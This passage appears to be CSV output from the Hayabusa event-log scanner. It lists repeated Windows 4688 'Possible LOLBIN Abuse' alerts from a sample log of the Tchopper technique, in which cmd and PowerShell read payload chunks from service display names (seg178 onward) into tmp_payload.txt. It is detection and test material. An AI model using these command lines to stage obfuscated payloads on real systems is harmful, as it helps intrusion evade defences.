+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 
